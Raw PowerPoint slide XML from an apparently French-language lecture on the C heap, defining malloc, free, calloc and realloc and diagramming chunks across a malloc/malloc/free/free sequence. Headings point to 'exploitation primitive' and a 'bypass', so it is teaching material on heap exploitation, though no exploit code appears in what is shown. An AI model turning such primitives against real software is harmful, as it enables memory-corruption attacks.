                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> octets dans le tas et retourne un pointeur vers la zone allouée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) : libère une zone allouée par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc,calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size_t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nmemb,size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> size): alloue de la mémoire pour un tableau de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmemb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> octets. Retourne un pointeur vers la zone allouée. La mémoire est mise à zéro. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr,size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> size): change la taille du bloc mémoire pointé par </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a: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Flèche : chevron 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B0BF035-6CC8-4402-903C-026CF002DE70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Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>layout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Flèche : chevron 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA27C34-EA31-4E56-9D09-AA89E05E6E92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malloc,free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>calloc,realloc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lèche : chevron 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A1B30D-FCEB-44D4-9249-C5F71DA8145D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Exploitation primitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flèche : chevron 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072ABA54-B090-48A2-8527-B4F2F436C61F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is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predictable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Flèche : chevron 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6395AD6-7BD9-429A-8B2F-C2F052B4E484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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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ED1440B3-DA80-48E0-B73F-030953FA5BEE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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nutshell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92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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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799"/>
            <a:ext cx="9144000" cy="3263091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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024C9E1-C1D6-49D7-9A05-CBAE1C77F16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="4005064"/>
            <a:ext cx="1790153" cy="8655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F06BCF-C950-49EF-B467-A79AA609C727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5843972" y="4005064"/>
            <a:ext cx="396044" cy="8655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EF2FD76-6BD0-4DCA-8817-0CE9B0DA1FDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4983887"/>
            <a:ext cx="2196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D5BD3593-3F20-4F2D-A4A2-AB0D1054641C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="499113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0x10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1676E9-5C65-44AE-8BE4-D211AD1DB4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9157264" y="3993459"/>
            <a:ext cx="1790153" cy="8655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9B68E4-136D-4F56-8D40-9AAAEBFE3D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8761220" y="3993459"/>
            <a:ext cx="396044" cy="8655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4A286533-680A-4664-8C1D-E5C0601A8FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8751174" y="4972282"/>
            <a:ext cx="2196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8A8E6B01-A6D7-4382-A11A-3FF13A13CD91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487355" y="49795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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Flèche : chevron 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84A8942-055A-4211-B081-AB0FFE8AC67B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7" name="Flèche : chevron 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C0C2CD-443E-490E-B390-FC24D1A3AFED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28" name="Flèche : chevron 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{433DAAA9-0012-4978-9867-63E43D5C3F3B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9" name="Flèche : chevron 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F50C285A-1F52-4CA8-B149-D236CAB71B4C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0" name="Flèche : chevron 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55452BFD-561A-4780-8556-D390158D0116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31" name="Flèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86AAE7FD-C262-47B1-91EC-1FF176855774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9771288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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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799"/>
            <a:ext cx="9144000" cy="3263091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a);</a:t>
            </a:r>
          </a:p>
          <a:p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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4251908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 : 0x10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766AEAC-8F2E-471D-BD5A-3FA50D7E9562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1860156" y="4715314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: 0x20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289C43B-1E24-4A66-8FEA-2FB177529FA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1895652" y="5216612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B09696-3A45-4419-9039-6D625FFDF666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6236543" y="5618580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790BBB8C-5BE8-49BC-B642-BD923E41BDBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="9" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668468" y="4899980"/>
            <a:ext cx="1172031" cy="1151388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4804359-0C9D-4303-87DF-4F08A0624E3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="5618580"/>
            <a:ext cx="3876572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4188BB-C493-4BD0-8247-252189E75333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="5618580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C60C1E4-E095-4A68-8CDE-9369D91B77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5840499" y="6628172"/>
            <a:ext cx="46686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61676E9-5C65-44AE-8BE4-D211AD1DB4DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9157264" y="3993459"/>
            <a:ext cx="1790153" cy="8655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9B68E4-136D-4F56-8D40-9AAAEBFE3D97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8761220" y="3993459"/>
            <a:ext cx="396044" cy="8655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4A286533-680A-4664-8C1D-E5C0601A8FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8751174" y="4972282"/>
            <a:ext cx="2196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8A8E6B01-A6D7-4382-A11A-3FF13A13CD91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9487355" y="49795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0x10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176D44-B56F-427F-9133-286202AF6EFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230664" y="3993459"/>
            <a:ext cx="396044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B728AF-3EFC-4256-8772-E445A83FD1E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6632587" y="3993459"/>
            <a:ext cx="1400001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9FBDE9-0360-462B-A155-317171317B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5834620" y="3993459"/>
            <a:ext cx="396044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20E07252-CE69-46D3-83CC-DDE2F407B8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5833926" y="4989561"/>
            <a:ext cx="2196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E75D4B00-0C23-4F56-ABE6-2B94123A5AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6570107" y="500561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0x10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Connecteur : en angle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51CA778A-F7EF-44CA-B078-25C8AB4EDAF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4668468" y="4426247"/>
            <a:ext cx="1166152" cy="41685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lèche : chevron 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94848167-E2D8-4059-83AD-108A46B83C2F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2" name="Flèche : chevron 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ABAD1DC-32F8-4ACE-AAA4-EF7BD7DB88E5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33" name="Flèche : chevron 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C21D7A00-0366-4AEF-B865-F08BC91F999A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4" name="Flèche : chevron 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDC08CC4-F728-4434-95DA-3EABB8A464F7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5" name="Flèche : chevron 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA613B59-DBD5-4FF6-A34F-41D48BF627D9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36" name="Flèche : chevron 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C54A5C6-43AA-45CE-A7D9-D783C06D9A29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4325345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D805B5-0A33-456D-AEB1-F046C1F4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 : bypass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B64D488-DA24-4045-90D0-05F4F880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799"/>
            <a:ext cx="9144000" cy="3263091"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>char* b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>free(b);</a:t>
            </a:r>
          </a:p>
          <a:p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512463-87D4-49DA-A05F-6A6AD5995464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4251908"/>
            <a:ext cx="18002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2F6A59-7BED-4457-9C90-B11EF416F5CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2868268" y="4683956"/>
            <a:ext cx="18002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E0F6EB0-DAB3-42EF-9979-12CF38B6C589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
